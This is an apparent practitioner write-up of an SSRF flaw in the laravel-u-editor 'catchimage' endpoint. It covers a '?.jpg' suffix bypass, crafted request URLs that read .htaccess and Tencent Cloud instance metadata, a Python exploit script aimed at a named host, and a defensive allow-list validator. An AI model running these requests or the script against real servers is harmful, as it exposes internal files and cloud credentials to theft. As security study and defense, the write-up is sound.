SSRF vulnerability testing practice and defense
Overview
The target was the company's internal test site. I tested a number of common issues on it (XSS, file upload, order-logic flaws), but this write-up covers only one SSRF vulnerability, which a senior colleague found by reading the code. I am using it to study the bug and to summarize what I learned at the same time; quite a few of the things I learned came from this one flaw, and it deepened my understanding of SSRF.
Vulnerability details
Vulnerability principle:
SSRF (Server-Side Request Forgery) is a vulnerability in which an attacker constructs a request that is then issued by the server itself. In general, the target of an SSRF is an internal system that cannot be reached from the external network. The root cause is usually that the server offers a feature for fetching data from other servers or applications but does not filter or restrict the destination address: for example, loading page text from a given URL, loading an image from a given address, or downloading a file. (Summarized from material on the web.)
There is plenty of material online about these principles, so I will not repeat it. What I want to explain in detail is how this vulnerability came about and how it was exploited.
Finding the vulnerability
The site uses the laravel-u-editor project from GitHub as its editor. UEditor is a WYSIWYG rich-text web editor developed by Baidu's web front-end R&D team.
The code is as follows:
public function server(Request $request)
{
    $config = config('UEditorUpload.upload');
    $action = $request->get('action');
    switch ($action) {
        case 'config':
            $result = $config;
            break;
        case 'uploadimage':
            $upConfig = array(
                "pathFormat" => $config['imagePathFormat'],
                "maxSize" => $config['imageMaxSize'],
                "allowFiles" => $config['imageAllowFiles'],
                'fieldName' => $config['imageFieldName'],
            );
            $result = with(new UploadFile($upConfig, $request))->upload();
            break;
        ......
        case 'catchimage':
            // Remote image "catcher": fetches every URL listed in the request's
            // source[] parameter and stores the response body as a local file
            $upConfig = array(
                "pathFormat" => $config['catcherPathFormat'],
                "maxSize" => $config['catcherMaxSize'],
                "allowFiles" => $config['catcherAllowFiles'],
                "oriName" => "remote.png",
                'fieldName' => $config['catcherFieldName'],
            );
            $sources = $request->get($upConfig['fieldName']); // list of URLs, fully caller-controlled
            $list = [];
            foreach ($sources as $imgUrl) {
                $upConfig['imgUrl'] = $imgUrl;
                $info = with(new UploadCatch($upConfig, $request))->upload();
                array_push($list, array(
                    "state" => $info["state"],
                    "url" => $info["url"],
                    "size" => $info["size"],
                    "title" => htmlspecialchars($info["title"]),
                    "original" => htmlspecialchars($info["original"]),
                    "source" => htmlspecialchars($imgUrl)
                ));
            }
            $result = [
                'state' => count($list) ? 'SUCCESS' : 'ERROR',
                'list' => $list
            ];
            break;
    }
Code audit shows that one of the parameters, $sources, is entirely under the caller's control:
$sources = $request->get($upConfig['fieldName']);
The value of the request's source parameter is read straight into $sources, and each entry is then used as imgUrl. Furthermore, the file-type check applied to each imgUrl can be bypassed. The code is as follows:
$fileType = strtolower(strrchr($imgUrl, '.'));
The suffix after the last "." in the URL is taken as the file type and checked against the types listed in allowFiles. Because strrchr() scans the whole URL string, query string included, appending ?.jpg is enough to satisfy the file-type check, and the server will then fetch and store the content of other files.
Exploiting the vulnerability
As a simple first test, read the .htaccess file.
Construct the request URL:
https://*/laravel-u-editor-server/server?action=catchimage&source[]=https://*/.htaccess?.jpg
First try visiting the file directly:
https://*/laravel-u-editor-server/server?action=catchimage&source[]=https://*/.htaccess
Clearly the content cannot be accessed that way. Next, visit the URL we constructed,
then open the image address returned in the response. There the content of the file can be seen.
Remember to view it as page source rather than as an image.
A small trick:
Because the site is hosted on Tencent Cloud, an SSRF vulnerability on it can be used to query the instance metadata endpoint that Tencent Cloud provides to the server, which exposes a lot of information about the instance. The metadata endpoint is documented at:
https://cloud.tencent.com/document/product/213/4934#.E6.9F.A5.E8.AF.A2.E5.AE.9E.E4.BE.8B.E5.85.83.E6.95.B0.E6.8D.AE
List all metadata categories:
https://*/laravel-u-editor-server/server?action=catchimage&source[]=http://metadata.tencentyun.com/latest/meta-data/?.jpg
Then visit the image address that is returned.
This lists every metadata category. We can then try to obtain the internal IP address and other details.
To pull further information, I used the following script:
#!/usr/bin/python3
#coding=utf-8
import requests
import sys
'''
SSRF exploitation script
Date: 2019-12-24
Author: yaunsky
Purpose: obtain instance metadata through the Tencent Cloud metadata endpoint
'''
# Fetch the metadata and print it
def imgRequests():
    # The Tencent Cloud metadata URL is taken from the command line
    source = sys.argv[1]
    # "?.jpg" is appended so that strrchr($imgUrl, '.') sees an allowed extension
    imgurl = "https://beta.4hou.com/laravel-u-editor-server/server?action=catchimage&source[]=" + source + "?.jpg"
    headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0"}
    req = requests.get(url=imgurl, headers=headers, timeout=10)
    print(jpgRequests(req))
# Follow the "image" URL in the catchimage response; the server stored the
# fetched body there as a .jpg, so its text is the metadata we asked for
def jpgRequests(req):
    jpgJson = req.json()
    if jpgJson.get('state') != 'SUCCESS' or not jpgJson.get('list'):
        return jpgJson  # the server did not store anything; show its answer instead
    jpgInfo = requests.get(jpgJson['list'][0]['url'], timeout=10)
    return jpgInfo.text
def main():
    if len(sys.argv) != 2:
        print("usage: %s <url-to-fetch-through-the-server>" % sys.argv[0])
        sys.exit(1)
    imgRequests()
if __name__ == "__main__":
    main()
Obtaining the server's user name:
Obtaining the server's public key:
Obtaining the real IP address:
Defending against the vulnerability
The fix is to set a URL whitelist that restricts which addresses imgUrl may point to, and at the same time to change how the file type of the source URL is validated so that it is taken from the URL path rather than from the whole string.
Modified code (simple example):
Visiting the earlier URL after the defense is in place:
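The following is an added example, not laravel-u-editor's code and not the patch from the screenshot above. It models in Python the catchimage file-type check that was bypassed with ?.jpg (the strrchr() logic discussed under "Finding the vulnerability") and places next to it the kind of whitelist check described in this section: an allow-list of hosts, an extension taken from the URL path only, and a refusal of any host that resolves to a non-public address such as the 169.254.0.0/16 range used by cloud metadata services. The host names and IP addresses in it are constructed samples, and the resolver is injectable so the check can be exercised offline.

```python
#!/usr/bin/env python3
"""Added example (not laravel-u-editor's code): a Python model of the
catchimage file-type check that was bypassed with "?.jpg", next to a
hardened check with a host allow-list, a path-based extension check and
a non-public-address check. Hosts and IPs below are constructed samples."""
import ipaddress
import socket
from urllib.parse import urlsplit

# Same idea as catcherAllowFiles in the UEditor config
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif", ".bmp"}


def vulnerable_file_type(img_url):
    """Mirrors PHP strtolower(strrchr($imgUrl, '.')): everything from the
    LAST dot in the whole URL string, query string included."""
    dot = img_url.rfind(".")
    return img_url[dot:].lower() if dot != -1 else ""


def vulnerable_check(img_url):
    """The original check: only the suffix is inspected, never the host."""
    return vulnerable_file_type(img_url) in ALLOWED_EXT


def path_extension(path):
    """Extension of the last path segment only ("/dir.v2/file" has none)."""
    dot = path.rfind(".")
    return path[dot:].lower() if dot > path.rfind("/") else ""


def is_public_ip(ip_text):
    """True only for globally routable addresses; loopback, RFC 1918 and
    link-local (169.254.0.0/16, where cloud metadata lives) return False."""
    addr = ipaddress.ip_address(ip_text.split("%")[0])
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped  # ::ffff:169.254.0.23 is judged as 169.254.0.23
    return addr.is_global


def resolve_host(host):
    """Default resolver: every address the host name resolves to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def hardened_check(img_url, allowed_hosts, resolver=resolve_host):
    """Allow-list validation of a catchimage source URL.
    Returns (ok, reason). allowed_hosts is a set of lowercase host names
    (an assumption of this example); the resolver is injectable for tests."""
    parts = urlsplit(img_url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    host = (parts.hostname or "").lower()  # hostname ignores any user@ prefix
    if host not in allowed_hosts:
        return False, "host not in allow-list"
    if path_extension(parts.path) not in ALLOWED_EXT:
        return False, "extension not allowed"
    try:
        ips = resolver(host)
    except OSError:
        return False, "host does not resolve"
    if not ips or not all(is_public_ip(ip) for ip in ips):
        return False, "host resolves to a non-public address"
    return True, "ok"


if __name__ == "__main__":
    # Constructed samples: the bypass from the write-up, then the same URL
    # against the hardened check with one allow-listed image host whose
    # (stand-in) resolver answer is a public address.
    probe = "https://img.example.com/.htaccess?.jpg"
    print("vulnerable check accepts it:", vulnerable_check(probe))
    print("hardened check:", hardened_check(probe, {"img.example.com"}, lambda h: ["8.8.8.8"]))
```

The same logic in PHP would use parse_url() for the host and path and gethostbynamel() for the address check. One caveat a whitelist alone does not cover: the DNS answer can change between this check and the actual fetch, and the fetcher may follow redirects, so the download should connect to the address that was checked and repeat the check on every redirect hop.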
Epilogue
Today most small and medium enterprises run on cloud services. If you run into an SSRF on such a site, the cloud provider's metadata API may let you obtain sensitive information through the vulnerability. If you are an enterprise user, you must also protect your own site: set up a whitelist and do not leave a gap for attackers to squeeze through.
This article is for learning and exchange only!
Where the "*" sign appears it is the platform's word filter; it generally stands for "penetration" (shentou) and "attack" (gongji).